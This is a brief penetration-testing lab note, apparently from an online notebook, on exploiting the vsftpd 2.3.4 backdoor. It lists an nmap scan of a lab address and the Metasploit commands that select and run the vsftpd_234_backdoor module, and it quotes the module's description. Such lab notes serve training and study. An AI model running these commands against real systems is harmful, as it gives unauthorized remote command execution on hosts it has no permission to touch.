vsftpd 2.3.4 - Backdoor Command Execution

#Enumeration

db_nmap -sS -sV -O 192.80.80.3

#Exploitation

Open msfconsole

search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
info
# Description:
#   This module exploits a malicious backdoor that was added to the 
#   VSFTPD download archive. This backdoor was introduced into the 
#   vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 
#   according to the most recent information available. This backdoor 
#   was removed on July 3rd 2011.
options
run

PreviousProFTPD 1.3.3c NextSSH

Last updated 1 year ago